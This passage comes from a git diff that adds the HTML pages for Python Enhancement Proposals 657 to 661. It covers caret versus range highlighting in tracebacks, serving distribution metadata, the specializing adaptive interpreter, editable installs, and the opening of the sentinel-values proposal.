Use a single caret instead of a range

+

It has been proposed to use a single caret instead of highlighting the full +range when reporting errors as a way to simplify the feature. We have decided +to not go this route for the following reasons:

+
    +
  • Deriving the location of the caret is not straightforward using the current +layout of the AST. This is because the AST nodes only record the start and end +line numbers as well as the start and end column offsets. As the AST nodes do +not preserve the original tokens (by design) deriving the exact location of some +tokens is not possible without extra re-parsing. For instance, currently binary +operators have nodes for the operands but the type of the operator is stored +in an enumeration so its location cannot be derived from the node (this is just +an example of how this problem manifest, and not the only one).
  • +
  • Deriving the ranges from AST nodes greatly simplifies the implementation and reduces +a lot the maintenance cost and the possibilities of errors. This is because using +the ranges is always possible to do generically for any AST node, while any other +custom information would need to be extracted differently from different types of +nodes. Given how error-prone getting the locations manually was when this used to +be a manual process when generating the AST, we believe that a generic solution is +a very important property to pursue.
  • +
  • Storing the information to highlight a single caret will be very limiting for tools +such as coverage tools and profilers as well as for tools like IPython and IDEs that +want to make use of this new feature. As this message from the author of “friendly-traceback” +mentions, the reason is that without the full range (including end lines) these tools +will find very difficult to highlight correctly the relevant source code. For instance, +for this code:
    something = foo(a,b,c) if bar(a,b,c) else other(b,c,d)
    +
    +
    +

    tools (such as coverage reporters) want to be able to highlight the totality of the call +that is covered by the executed bytecode (let’s say foo(a,b,c)) and not just a single +character. Even if is technically possible to re-parse and re-tokenize the source code +to re-construct the information, it is not possible to do this reliably and would +result in a much worse user experience.

    +
  • +
  • Many users have reported that a single caret is much harder to read than a full range, +and this motivated using ranges to highlight syntax errors, which was very well received. +Additionally, it has been noted that users with vision problems can identify the ranges +much easily than a single caret character, which we believe is a great advantage of +using ranges.
  • +
+
+
+

Have a configure flag to opt out

+

Having a configure flag to opt out of the overhead even when executing Python +in non-optimized mode may sound desirable, but it may cause problems when +reading pyc files that were created with a version of the interpreter that was +not compiled with the flag activated. This can lead to crashes that would be +very difficult to debug for regular users and will make different pyc files +incompatible between each other. As this pyc could be shipped as part of +libraries or applications without the original source, it is also not always +possible to force recompilation of said pyc files. For these reasons we have +decided to use the -O flag to opt-out of this behaviour.

+
+
+

Lazy loading of column information

+

One potential solution to reduce the memory usage of this feature is to not +load the column information from the pyc file when code is imported. Only if an +uncaught exception bubbles up or if a call to the C-API functions is made will +the column information be loaded from the pyc file. This is similar to how we +only read source lines to display them in the traceback when an exception +bubbles up. While this would indeed lower memory usage, it also results in a +far more complex implementation requiring changes to the importing machinery to +selectively ignore a part of the code object. We consider this an interesting +avenue to explore but ultimately we think is out of the scope for this particular +PEP. It also means that column information will not be available if the user is +not using pyc files or for code objects created dynamically at runtime.

+
+
+

Implement compression

+

Although it would be possible to implement some form of compression over the +pyc files and the new data in code objects, we believe that this is out of the +scope of this proposal due to its larger impact (in the case of pyc files) and +the fact that we expect column offsets to not compress well due to the lack of +patterns in them (in case of the new data in code objects).

+
+
+
+

Acknowledgments

+

Thanks to Carl Friedrich Bolz-Tereick for showing an initial prototype of this +idea for the Pypy interpreter and for the helpful discussion.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0657.rst

+

Last modified: 2024-02-24 02:21:19 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0658/index.html b/pep-0658/index.html new file mode 100644 index 00000000000..f2ee74bc03a --- /dev/null +++ b/pep-0658/index.html @@ -0,0 +1,293 @@ + + + + + + + + PEP 658 – Serve Distribution Metadata in the Simple Repository API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 658 – Serve Distribution Metadata in the Simple Repository API

+
+
Author:
+
Tzu-ping Chung <uranusjr at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
10-May-2021
+
Post-History:
+
10-May-2021
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an anchor tag to expose the METADATA file +from distributions in the PEP 503 “simple” repository API. A +data-dist-info-metadata attribute is introduced to indicate that +the file from a given distribution can be independently fetched.

+
+
+

Motivation

+

Package management workflows made popular by recent tooling increase +the need to inspect distribution metadata without intending to install +the distribution, and download multiple distributions of a project to +choose from based on their metadata. This means they end up discarding +much downloaded data, which is inefficient and results in a bad user +experience.

+
+
+

Rationale

+

Tools have been exploring methods to reduce the download size by +partially downloading wheels with HTTP range requests. This, however, +adds additional run-time requirements to the repository server. It +also still adds additional overhead, since a separate request is +needed to fetch the wheel’s file listing to find the correct offset to +fetch the metadata file. It is therefore desired to make the server +extract the metadata file in advance, and serve it as an independent +file to avoid the need to perform additional requests and ZIP +inspection.

+

The metadata file defined by the Core Metadata Specification +[core-metadata] will be served directly by repositories since it +contains the necessary information for common use cases. The metadata +must only be served for standards-compliant distributions such as +wheels [wheel] and sdists [sdist], and must be identical to the +distribution’s canonical metadata file, such as a wheel’s METADATA +file in the .dist-info directory [dist-info].

+

An HTML attribute on the distribution file’s anchor link is needed to +indicate whether a client is able to choose the separately served +metadata file. The attribute is also used to provide the metadata +content’s hash for client-side verification. The attribute’s absence +indicates that a separate metadata entry is not available for the +distribution, either because of the distribution’s content, or lack of +repository support.

+
+
+

Specification

+

In a simple repository’s project page, each anchor tag pointing to a +distribution MAY have a data-dist-info-metadata attribute. The +presence of the attribute indicates the distribution represented by +the anchor tag MUST contain a Core Metadata file that will not be +modified when the distribution is processed and/or installed.

+

If a data-dist-info-metadata attribute is present, the repository +MUST serve the distribution’s Core Metadata file alongside the +distribution with a .metadata appended to the distribution’s file +name. For example, the Core Metadata of a distribution served at +/files/distribution-1.0-py3.none.any.whl would be located at +/files/distribution-1.0-py3.none.any.whl.metadata. This is similar +to how PEP 503 specifies the GPG signature file’s location.

+

The repository SHOULD provide the hash of the Core Metadata file +as the data-dist-info-metadata attribute’s value using the syntax +<hashname>=<hashvalue>, where <hashname> is the lower cased +name of the hash function used, and <hashvalue> is the hex encoded +digest. The repository MAY use true as the attribute’s value +if a hash is unavailable.

+
+
+

Backwards Compatibility

+

If an anchor tag lacks the data-dist-info-metadata attribute, +tools are expected to revert to their current behaviour of downloading +the distribution to inspect the metadata.

+

Older tools not supporting the new data-dist-info-metadata +attribute are expected to ignore the attribute and maintain their +current behaviour of downloading the distribution to inspect the +metadata. This is similar to how prior data- attribute additions +expect existing tools to operate.

+
+
+

Rejected Ideas

+
+

Put metadata content on the project page

+

Since tools generally only need dependency information from a +distribution in addition to what’s already available on the project +page, it was proposed that repositories may directly include the +information on the project page, like the data-requires-python +attribute specified in PEP 503.

+

This approach was abandoned since a distribution may contain +arbitrarily long lists of dependencies (including required and +optional), and it is unclear whether including the information for +every distribution in a project would result in net savings since the +information for most distributions generally ends up unneeded. By +serving the metadata separately, performance can be better estimated +since data usage will be more proportional to the number of +distributions inspected.

+
+
+

Expose more files in the distribution

+

It was proposed to provide the entire .dist-info directory as a +separate part, instead of only the metadata file. However, serving +multiple files in one entity through HTTP requires re-archiving them +separately after they are extracted from the original distribution +by the repository server, and there are no current use cases for files +other than METADATA when the distribution itself is not going to +be installed.

+

It should also be noted that the approach taken here does not +preclude other files from being introduced in the future, whether we +want to serve them together or individually.

+
+
+

Explicitly specify the metadata file’s URL on the project page

+

An early version of this draft proposed putting the metadata file’s +URL in the data-dist-info-metadata attribute. But people feel it +is better for discoverability to require the repository to serve the +metadata file at a determined location instead. The current approach +also has an additional benefit of making the project page smaller.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0658.rst

+

Last modified: 2023-10-13 05:15:59 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0659/index.html b/pep-0659/index.html new file mode 100644 index 00000000000..01ddbfc929b --- /dev/null +++ b/pep-0659/index.html @@ -0,0 +1,542 @@ + + + + + + + + PEP 659 – Specializing Adaptive Interpreter | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 659 – Specializing Adaptive Interpreter

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
13-Apr-2021
+
Post-History:
+
11-May-2021
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Specializing Adaptive Interpreter.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

In order to perform well, virtual machines for dynamic languages must +specialize the code that they execute to the types and values in the +program being run. This specialization is often associated with “JIT” +compilers, but is beneficial even without machine code generation.

+

A specializing, adaptive interpreter is one that speculatively specializes +on the types or values it is currently operating on, and adapts to changes +in those types and values.

+

Specialization gives us improved performance, and adaptation allows the +interpreter to rapidly change when the pattern of usage in a program alters, +limiting the amount of additional work caused by mis-specialization.

+

This PEP proposes using a specializing, adaptive interpreter that specializes +code aggressively, but over a very small region, and is able to adjust to +mis-specialization rapidly and at low cost.

+

Adding a specializing, adaptive interpreter to CPython will bring significant +performance improvements. It is hard to come up with meaningful numbers, +as it depends very much on the benchmarks and on work that has not yet happened. +Extensive experimentation suggests speedups of up to 50%. +Even if the speedup were only 25%, this would still be a worthwhile enhancement.

+
+
+

Motivation

+

Python is widely acknowledged as slow. +Whilst Python will never attain the performance of low-level languages like C, +Fortran, or even Java, we would like it to be competitive with fast +implementations of scripting languages, like V8 for Javascript or luajit for +lua. +Specifically, we want to achieve these performance goals with CPython to +benefit all users of Python including those unable to use PyPy or +other alternative virtual machines.

+

Achieving these performance goals is a long way off, and will require a lot of +engineering effort, but we can make a significant step towards those goals by +speeding up the interpreter. +Both academic research and practical implementations have shown that a fast +interpreter is a key part of a fast virtual machine.

+

Typical optimizations for virtual machines are expensive, so a long “warm up” +time is required to gain confidence that the cost of optimization is justified. +In order to get speed-ups rapidly, without noticeable warmup times, +the VM should speculate that specialization is justified even after a few +executions of a function. To do that effectively, the interpreter must be able +to optimize and de-optimize continually and very cheaply.

+

By using adaptive and speculative specialization at the granularity of +individual virtual machine instructions, +we get a faster interpreter that also generates profiling information +for more sophisticated optimizations in the future.

+
+
+

Rationale

+

There are many practical ways to speed-up a virtual machine for a dynamic +language. +However, specialization is the most important, both in itself and as an +enabler of other optimizations. +Therefore it makes sense to focus our efforts on specialization first, +if we want to improve the performance of CPython.

+

Specialization is typically done in the context of a JIT compiler, +but research shows specialization in an interpreter can boost performance +significantly, even outperforming a naive compiler [1].

+

There have been several ways of doing this proposed in the academic +literature, but most attempt to optimize regions larger than a +single bytecode [1] [2]. +Using larger regions than a single instruction requires code to handle +de-optimization in the middle of a region. +Specialization at the level of individual bytecodes makes de-optimization +trivial, as it cannot occur in the middle of a region.

+

By speculatively specializing individual bytecodes, we can gain significant +performance improvements without anything but the most local, +and trivial to implement, de-optimizations.

+

The closest approach to this PEP in the literature is +“Inline Caching meets Quickening” [3]. +This PEP has the advantages of inline caching, +but adds the ability to quickly de-optimize making the performance +more robust in cases where specialization fails or is not stable.

+
+

Performance

+

The speedup from specialization is hard to determine, as many specializations +depend on other optimizations. Speedups seem to be in the range 10% - 60%.

+
    +
  • Most of the speedup comes directly from specialization. The largest +contributors are speedups to attribute lookup, global variables, and calls.
  • +
  • A small, but useful, fraction is from improved dispatch such as +super-instructions and other optimizations enabled by quickening.
  • +
+
+
+
+

Implementation

+
+

Overview

+

Any instruction that would benefit from specialization will be replaced by an +“adaptive” form of that instruction. When executed, the adaptive instructions +will specialize themselves in response to the types and values that they see. +This process is known as “quickening”.

+

Once an instruction in a code object has executed enough times, +that instruction will be “specialized” by replacing it with a new instruction +that is expected to execute faster for that operation.

+
+
+

Quickening

+

Quickening is the process of replacing slow instructions with faster variants.

+

Quickened code has a number of advantages over immutable bytecode:

+
    +
  • It can be changed at runtime.
  • +
  • It can use super-instructions that span lines and take multiple operands.
  • +
  • It does not need to handle tracing as it can fallback to the original +bytecode for that.
  • +
+

In order that tracing can be supported, the quickened instruction format +should match the immutable, user visible, bytecode format: +16-bit instructions of 8-bit opcode followed by 8-bit operand.

+
+
+

Adaptive instructions

+

Each instruction that would benefit from specialization is replaced by an +adaptive version during quickening. For example, +the LOAD_ATTR instruction would be replaced with LOAD_ATTR_ADAPTIVE.

+

Each adaptive instruction periodically attempts to specialize itself.

+
+
+

Specialization

+

CPython bytecode contains many instructions that represent high-level +operations, and would benefit from specialization. Examples include CALL, +LOAD_ATTR, LOAD_GLOBAL and BINARY_ADD.

+

By introducing a “family” of specialized instructions for each of these +instructions allows effective specialization, +since each new instruction is specialized to a single task. +Each family will include an “adaptive” instruction, that maintains a counter +and attempts to specialize itself when that counter reaches zero.

+

Each family will also include one or more specialized instructions that +perform the equivalent of the generic operation much faster provided their +inputs are as expected. +Each specialized instruction will maintain a saturating counter which will +be incremented whenever the inputs are as expected. Should the inputs not +be as expected, the counter will be decremented and the generic operation +will be performed. +If the counter reaches the minimum value, the instruction is de-optimized by +simply replacing its opcode with the adaptive version.

+
+
+

Ancillary data

+

Most families of specialized instructions will require more information than +can fit in an 8-bit operand. To do this, a number of 16 bit entries immediately +following the instruction are used to store this data. This is a form of inline +cache, an “inline data cache”. Unspecialized, or adaptive, instructions will +use the first entry of this cache as a counter, and simply skip over the others.

+
+
+

Example families of instructions

+
+

LOAD_ATTR

+

The LOAD_ATTR instruction loads the named attribute of the object on top of the stack, +then replaces the object on top of the stack with the attribute.

+

This is an obvious candidate for specialization. Attributes might belong to +a normal instance, a class, a module, or one of many other special cases.

+

LOAD_ATTR would initially be quickened to LOAD_ATTR_ADAPTIVE which +would track how often it is executed, and call the _Py_Specialize_LoadAttr +internal function when executed enough times, or jump to the original +LOAD_ATTR instruction to perform the load. When optimizing, the kind +of the attribute would be examined, and if a suitable specialized instruction +was found, it would replace LOAD_ATTR_ADAPTIVE in place.

+

Specialization for LOAD_ATTR might include:

+
    +
  • LOAD_ATTR_INSTANCE_VALUE A common case where the attribute is stored in +the object’s value array, and not shadowed by an overriding descriptor.
  • +
  • LOAD_ATTR_MODULE Load an attribute from a module.
  • +
  • LOAD_ATTR_SLOT Load an attribute from an object whose +class defines __slots__.
  • +
+

Note how this allows optimizations that complement other optimizations. +The LOAD_ATTR_INSTANCE_VALUE works well with the “lazy dictionary” used for +many objects.

+
+
+

LOAD_GLOBAL

+

The LOAD_GLOBAL instruction looks up a name in the global namespace +and then, if not present in the global namespace, +looks it up in the builtins namespace. +In 3.9 the C code for the LOAD_GLOBAL includes code to check to see +whether the whole code object should be modified to add a cache, +whether either the global or builtins namespace, +code to lookup the value in a cache, and fallback code. +This makes it complicated and bulky. +It also performs many redundant operations even when supposedly optimized.

+

Using a family of instructions makes the code more maintainable and faster, +as each instruction only needs to handle one concern.

+

Specializations would include:

+
    +
  • LOAD_GLOBAL_ADAPTIVE would operate like LOAD_ATTR_ADAPTIVE above.
  • +
  • LOAD_GLOBAL_MODULE can be specialized for the case where the value is in +the globals namespace. After checking that the keys of the namespace have +not changed, it can load the value from the stored index.
  • +
  • LOAD_GLOBAL_BUILTIN can be specialized for the case where the value is +in the builtins namespace. It needs to check that the keys of the global +namespace have not been added to, and that the builtins namespace has not +changed. Note that we don’t care if the values of the global namespace +have changed, just the keys.
  • +
+

See [4] for a full implementation.

+
+

Note

+

This PEP outlines the mechanisms for managing specialization, and does not +specify the particular optimizations to be applied. +It is likely that details, or even the entire implementation, may change +as the code is further developed.

+
+
+
+
+
+

Compatibility

+

There will be no change to the language, library or API.

+

The only way that users will be able to detect the presence of the new +interpreter is through timing execution, the use of debugging tools, +or measuring memory use.

+
+
+

Costs

+
+

Memory use

+

An obvious concern with any scheme that performs any sort of caching is +“how much more memory does it use?”. +The short answer is “not that much”.

+
+

Comparing memory use to 3.10

+

CPython 3.10 used 2 bytes per instruction, until the execution count +reached ~2000 when it allocates another byte per instruction and +32 bytes per instruction with a cache (LOAD_GLOBAL and LOAD_ATTR).

+

The following table shows the additional bytes per instruction to support the +3.10 opcache or the proposed adaptive interpreter, on a 64 bit machine.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Version3.10 cold3.10 hot3.11
Specialised0%~15%~25%
code222
opcache_map010
opcache/data04.84
Total27.86
+

3.10 cold is before the code has reached the ~2000 limit. +3.10 hot shows the cache use once the threshold is reached.

+

The relative memory use depends on how much code is “hot” enough to trigger +creation of the cache in 3.10. The break even point, where the memory used +by 3.10 is the same as for 3.11 is ~70%.

+

It is also worth noting that the actual bytecode is only part of a code +object. Code objects also include names, constants and quite a lot of +debugging information.

+

In summary, for most applications where many of the functions are relatively +unused, 3.11 will consume more memory than 3.10, but not by much.

+
+
+
+
+

Security Implications

+

None

+
+
+

Rejected Ideas

+

By implementing a specializing adaptive interpreter with inline data caches, +we are implicitly rejecting many alternative ways to optimize CPython. +However, it is worth emphasizing that some ideas, such as just-in-time +compilation, have not been rejected, merely deferred.

+
+

Storing data caches before the bytecode.

+

An earlier implementation of this PEP for 3.11 alpha used a different caching +scheme as described below:

+
+
Quickened instructions will be stored in an array (it is neither necessary not +desirable to store them in a Python object) with the same format as the +original bytecode. Ancillary data will be stored in a separate array.

Each instruction will use 0 or more data entries. +Each instruction within a family must have the same amount of data allocated, +although some instructions may not use all of it. +Instructions that cannot be specialized, e.g. POP_TOP, +do not need any entries. +Experiments show that 25% to 30% of instructions can be usefully specialized. +Different families will need different amounts of data, +but most need 2 entries (16 bytes on a 64 bit machine).

+

In order to support larger functions than 256 instructions, +we compute the offset of the first data entry for instructions +as (instruction offset)//2 + (quickened operand).

+

Compared to the opcache in Python 3.10, this design:

+
    +
  • is faster; it requires no memory reads to compute the offset. +3.10 requires two reads, which are dependent.
  • +
  • uses much less memory, as the data can be different sizes for different +instruction families, and doesn’t need an additional array of offsets. +can support much larger functions, up to about 5000 instructions +per function. 3.10 can support about 1000.
  • +
+
+

We rejected this scheme as the inline cache approach is both faster +and simpler.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0659.rst

+

Last modified: 2024-10-29 10:45:35 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0660/index.html b/pep-0660/index.html new file mode 100644 index 00000000000..83eb5e05c4a --- /dev/null +++ b/pep-0660/index.html @@ -0,0 +1,434 @@ + + + + + + + + PEP 660 – Editable installs for pyproject.toml based builds (wheel based) | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 660 – Editable installs for pyproject.toml based builds (wheel based)

+
+
Author:
+
Daniel Holth <dholth at gmail.com>, Stéphane Bidoul <stephane.bidoul at gmail.com>
+
Sponsor:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
30-Mar-2021
+
Post-History:
+

+
Resolution:
+
Discourse thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes a PEP 517 style method for the installation of packages +in editable mode.

+
+
+

Motivation

+

Python programmers want to be able to develop packages without having to +install (i.e. copy) them into site-packages, for example, by working in a +checkout of the source repository.

+

While this can be done by adding the relevant source directories to +PYTHONPATH, setuptools provides the setup.py develop mechanism that +makes the process easier, and also installs dependencies and entry points such +as console scripts. pip exposes this mechanism via its pip install +--editable option.

+

The installation of projects in such a way that the python code being +imported remains in the source directory is known as the editable +installation mode.

+

Now that PEP 517 provides a mechanism to create alternatives to setuptools, and +decouple installation front ends from build backends, we need a new mechanism +to install packages in editable mode.

+
+
+

Rationale

+

PEP 517 deferred “Editable installs”, meaning non-setup.py +distributions lacked that feature. The only way to retain editable installs +for these distributions was to provide a compatible setup.py develop +implementation. By defining an editable hook other build frontends gain +parity with setup.py.

+
+
+

Terminology and goals

+

The editable installation mode implies that the source code of the project +being installed is available in a local directory.

+

Once the project is installed in editable mode, users expect that changes to +the project python code in the local source tree become effective without the +need of a new installation step.

+

Some kind of changes, such as the addition or modification of entry points, or +the addition of new dependencies, require a new installation step to become +effective. These changes are typically made in build backend configuration +files (such as pyproject.toml), so it is consistent with the general user +expectation that python source code is imported from the source tree.

+

The modification of non-python source code such a C extension modules obviously +require a compilation and/or installation step to become effective. The exact +steps to perform will remain specific to the build backend used.

+

When a project is installed in editable mode, users expect the installation to +behave identically as a regular installation. In particular the code must be +importable by other code, and metadata must be available to standard mechanisms +such as importlib.metadata.

+

Depending on the way build backends implement this specification, some minor +differences may be visible such as the presence of additional files that are in +the source tree and would not be part of a regular install. Build backends are +encouraged to document such potential differences.

+
+
+

The Mechanism

+

This PEP adds three optional hooks to the PEP 517 backend interface. These hooks +are used to build a wheel that, when installed, allows that distribution to be +imported from its source folder.

+
+

build_editable

+
def build_editable(wheel_directory, config_settings=None, metadata_directory=None):
+    ...
+
+
+

Must build a .whl file, and place it in the specified wheel_directory. +It must return the basename (not the full path) of the .whl file it creates, as +a unicode string.

+

May do an in-place build of the distribution as a side effect so that any +extension modules or other built artifacts are ready to be used.

+

The .whl file must comply with the Wheel binary file format specification (PEP +427). In particular it must contain a compliant .dist-info directory. +Metadata must be identical as the one that would have been produced by +build_wheel or prepare_metadata_for_build_wheel, except for +Requires-Dist which may differ slightly as explained below.

+

Build-backends must produce wheels that have the same dependencies +(Requires-Dist metadata) as wheels produced by the build_wheel hook, +with the exception that they can add dependencies necessary for their editable +mechanism to function at runtime (such as editables).

+

The filename for the “editable” wheel needs to be PEP 427 compliant too. It +does not need to use the same tags as build_wheel but it must be tagged as +compatible with the system.

+

If the build frontend has previously called prepare_metadata_for_build_editable +and depends on the wheel resulting from this call to have metadata +matching this earlier call, then it should provide the path to the created +.dist-info directory as the metadata_directory argument. If this +argument is provided, then build_editable MUST produce a wheel with identical +metadata. The directory passed in by the build frontend MUST be +identical to the directory created by prepare_metadata_for_build_editable, +including any unrecognized files it created.

+

An “editable” wheel uses the wheel format not for distribution but as ephemeral +communication between the build system and the front end. This avoids having +the build backend install anything directly. This wheel must not be exposed +to end users, nor cached, nor distributed.

+
+
+

get_requires_for_build_editable

+
def get_requires_for_build_editable(config_settings=None):
+    ...
+
+
+

This hook MUST return an additional list of strings containing PEP 508 +dependency specifications, above and beyond those specified in the +pyproject.toml file, to be installed when calling the +build_editable hooks.

+

If not defined, the default implementation is equivalent to return [].

+
+
+

prepare_metadata_for_build_editable

+
def prepare_metadata_for_build_editable(metadata_directory, config_settings=None):
+    ...
+
+
+

Must create a .dist-info directory containing wheel metadata +inside the specified metadata_directory (i.e., creates a directory +like {metadata_directory}/{package}-{version}.dist-info/). This +directory MUST be a valid .dist-info directory as defined in the +wheel specification, except that it need not contain RECORD or +signatures. The hook MAY also create other files inside this +directory, and a build frontend MUST preserve, but otherwise ignore, such files; +the intention +here is that in cases where the metadata depends on build-time +decisions, the build backend may need to record these decisions in +some convenient format for re-use by the actual wheel-building step.

+

This must return the basename (not the full path) of the .dist-info +directory it creates, as a unicode string.

+

If a build frontend needs this information and the method is +not defined, it should call build_editable and look at the resulting +metadata directly.

+
+
+

What to put in the wheel

+

Build backends must populate the generated wheel with files that when installed will result in an editable install. +Build backends may use different techniques to achieve the goals of an editable +install. This section provides examples and is not normative.

+
    +
  • Build backends may choose to place a .pth file at the root of the .whl file, +containing the root directory of the source tree. This approach is simple but +not very precise, although it may be considered good enough (especially when +using the src layout) and is similar to what setup.py develop +currently does.
  • +
  • The editables library shows how to build proxy modules that +provide a high quality editable installation. It accepts a list of modules +to include, and hide. When imported, these proxy modules replace themselves +with the code from the source tree. Path-based methods make all scripts under +a path importable, often including the project’s own setup.py and other +scripts that would not be part of a normal installation. The proxy strategy +can achieve a higher level of fidelity than path-based methods.
  • +
  • Symbolic links are another useful mechanism to realize editable installs. +Since, at the time this writing, the wheel specification does not support +symbolic links, they are not directly usable to set-up symbolic links in the +target environment. It is however possible for the backend to create a +symlink structure in some build directory of the source tree, and add +that directory to the python path via a .pth file in the “editable” +wheel. If some files linked in this manner depend on python implementation or +version, ABI or platform, care must be taken to generate the link structure +in different directories depending on compatibility tags, so the same project +tree can be installed in editable mode in multiple environments.
  • +
+
+
+

Frontend requirements

+

Frontends must install “editable” wheels in the same way as regular wheels. +This also means uninstallation of editables does not require any special treatment.

+

Frontends must create a direct_url.json file in the .dist-info +directory of the installed distribution, in compliance with PEP 610. The +url value must be a file:// url pointing to the project directory +(i.e. the directory containing pyproject.toml), and the dir_info value +must be {'editable': true}.

+

Frontends must execute get_requires_for_build_editable hooks in +an environment which contains the bootstrap requirements specified in the +pyproject.toml file.

+

Frontends must execute the prepare_metadata_for_build_editable and +build_editable hooks in an environment which contains the bootstrap +requirements from pyproject.toml and those specified by the +get_requires_for_build_editable hook.

+

Frontends must not expose the wheel obtained from build_editable +to end users. The wheel must be discarded after installation and must not be +cached nor distributed.

+
+
+
+

Limitations

+

With regard to the wheel .data directory, this PEP focuses on making the +purelib and platlib categories (installed into site-packages) +“editable”. It does not make special provision for the other categories such as +headers, data and scripts. Package authors are encouraged to use +console_scripts, make their scripts tiny wrappers around library +functionality, or manage these from the source checkout during development.

+
+
+

Prototypes

+

At the time of writing this PEP, several prototype implementations are +available in various frontends and backends. We provide links below to +illustrate possible approaches.

+

Frontends:

+ +

Build backends:

+ +
+
+

Rejected ideas

+
+

editable local version identifier

+

The ideas of having build backends append or modify the local version +identifier to include the editable string has been rejected because it +would not satisfy == version speicifier that include the local version +identifier. In other words pkg==1.0+local is not satisfied by version +1.0+local.editable.

+
+
+

Virtual wheel

+

Another approach was proposed in PEP 662, where +the build backend returns a mapping from source files and directories to the +installed layout. It is then up to the installer frontend to realize the +editable installation by whatever means it deems adequate for its users.

+

In terms of capabilities, both proposals provide the core “editable” feature.

+

The key difference is that PEP 662 leaves it to the frontend to decide how the +editable installation will be realized, while with this PEP, the choice must be +made by the backend. Both approaches can in principle provide several editable +installation methods for a given project, and let the developer choose one at +install time.

+

At the time of writing this PEP, it is clear that the community has a wide +range of theoretical and practical expectations about editable installs. The +reality is that the only one there is wide experience with is path insertion +via .pth (i.e. what setup.py develop does).

+

We believe that PEP 660 better addresses these “unknown unknowns” today in the +most reliable way, by letting project authors select the backend or implement +the method that provides the editable mechanism that best suit their +requirements, and test it works correctly. Since the frontend has no latitude +in how to install the “editable” wheel, in case of issue, there is only one +place to investigate: the build backend.

+

With PEP 662, issues need to be investigated in the frontend, +the backend and possiblty the specification. There is also a high probability +that different frontends, implementing the specification in different ways, +will produce installations that behave differently than project authors +intended, creating confusion, or worse, projects that only work with specific +frontends or IDEs.

+
+
+

Unpacked wheel

+

A prototype was made that +created an unpacked wheel in a temporary directory, to be copied to the target +environment by the frontend. This approach was not pursued because a wheel +archive is easy to create for the backend, and using a wheel as communication +mechanism is a better fit with the PEP 517 philosophy, and therefore keeps +things simpler for the frontend.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0660.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0661/index.html b/pep-0661/index.html new file mode 100644 index 00000000000..d8b0aa193c8 --- /dev/null +++ b/pep-0661/index.html @@ -0,0 +1,613 @@ + + + + + + + + PEP 661 – Sentinel Values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 661 – Sentinel Values

+
+
Author:
+
Tal Einat <tal at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
06-Jun-2021
+
Post-History:
+
20-May-2021, 06-Jun-2021
+
+
+
+
Table of Contents +
+

TL;DR: See the Specification and Reference Implementation.

+
+

Abstract

+

Unique placeholder values, commonly known as “sentinel values”, are common in +programming. They have many uses, such as for:

+
    +
  • Default values for function arguments, for when a value was not given:
    def foo(value=None):
    +    ...
    +
    +
    +
  • +
  • Return values from functions when something is not found or unavailable:
    >>> "abc".find("d")
    +-1
    +
    +
    +
  • +
  • Missing data, such as NULL in relational databases or “N/A” (“not +available”) in spreadsheets
  • +
+

Python has the special value None, which is intended to be used as such +a sentinel value in most cases. However, sometimes an alternative sentinel +value is needed, usually when it needs to be distinct from None since +None is a valid value in that context. Such cases are common enough that +several idioms for implementing such sentinels have arisen over the years, but +uncommon enough that there hasn’t been a clear need for standardization. +However, the common implementations, including some in the stdlib, suffer from +several significant drawbacks.

+

This PEP proposes adding a utility for defining sentinel values, to be used +in the stdlib and made publicly available as part of the stdlib.

+

Note: Changing all existing sentinels in the stdlib to be implemented this +way is not deemed necessary, and whether to do so is left to the discretion +of the maintainers.

+
+
+

Motivation

+

In May 2021, a question was brought up on the python-dev mailing list +[1] about how to better implement a sentinel value for +traceback.print_exception. The existing implementation used the +following common idiom:

+
_sentinel = object()
+
+
+

However, this object has an uninformative and overly verbose repr, causing the +function’s signature to be overly long and hard to read:

+
>>> help(traceback.print_exception)
+Help on function print_exception in module traceback:
+
+print_exception(exc, /, value=<object object at
+0x000002825DF09650>, tb=<object object at 0x000002825DF09650>,
+limit=None, file=None, chain=True)
+
+
+

Additionally, two other drawbacks of many existing sentinels were brought up +in the discussion:

+
    +
  1. Some do not have a distinct type, hence it is impossible to define clear +type signatures for functions with such sentinels as default values.
  2. +
